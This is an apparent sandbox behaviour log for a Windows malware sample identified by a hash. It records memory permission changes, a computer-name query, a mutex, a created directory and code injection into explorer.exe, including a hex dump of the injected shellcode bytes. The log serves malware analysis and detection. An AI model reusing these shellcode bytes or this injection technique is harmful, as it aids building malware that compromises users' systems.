Memory attributes changed	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write	success or wait	528918834
Memory attributes changed	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 45115C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	528919999
Memory attributes changed	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 464384 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	528920508
Memory allocated	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 330000 Length: 12FFAC Allocation Type: unknown Protection: page execute and read and write	success or wait	528921398
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName Name: ComputerName	success or wait	528925865
File created	Path: C:\skhfushjflw\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: null	success or wait	528936257
Mutant created	Name: \BaseNamedObjects\ofjwkwufhdjfgki	success or wait	528942087
Memory attributes changed	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe Base: 463784 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	528943120
System info queried	Type: ProcessInformation	success or wait	528944137
Section loaded	Path: unknown Access: query and write and read Type: commit Baseaddress: 330000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	528951124
Memory allocated	PID: 1552 Path: C:\WINDOWS\explorer.exe Base: BA0000 Length: 12FFAC Allocation Type: unknown Protection: page execute and read and write	success or wait	528969318
Memory written	PID: 1552 Path: C:\WINDOWS\explorer.exe Base: BA0000 Length: 4096 Value: 55 8B EC 81 EC C8 06 00 00 83 65 E0 00 53 56 57 33 C0 8D 7D E4 AB AB AB 8D 85 54 FF FF FF C7 45 B8 5C 3F 3F 5C C6 45 BC 00 89 85 50 FF FF FF E8 00 00 00 00 58 89 45 F8 8B 45 F8 8B D0 81 E2 FF 0F 00 00 33 C9 2B C2 41 05 20 0B 00 00 81 38 21 45 59 45 8B F8 89 7D C4 74 0B 41 05 00 10 00 00 83 F9 0A 76 E8 83 F9 0A 75 01 CC 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 E8 93 43 77 6A 01 8B F0 E8 36 04 00 00 59 59 85 C0 74 15 89 65 C0 68 04 01 00 00 8D 8D 44 FC FF FF 51 56 FF D0 8B 65 C0 68 AE B1 A6 C2 33 F6 56 E8 0E 04 00 00 59 59 3B C6 74 11 89 65 9C 8D 4D FF 51 56 6A 01 6A 14 FF D0 8B 65 9C 64 A1 18 00 00 00 68 77 35 07 0A 6A 01 89 70 34 E8 E2 03 00 00 59 59 3B C6 74 14 89 65 A4 56 8D 8F 08 01 00 00 51 FF D0 8B 65 A4 3B C6 75 13 64 A1 18 00 00 00 81 78 34	success or wait	534146800
Mutant created	Name: \BaseNamedObjects\ofjwkwufhdjfgki	object name exists	548745769
Process terminated	PID: 1780 Path: C:\7db482f5469dfeb0a6b2b4f66c062314.exe	success or wait	548757927

Analysis File: explorer.exe PID: 1552 Parent PID: 1780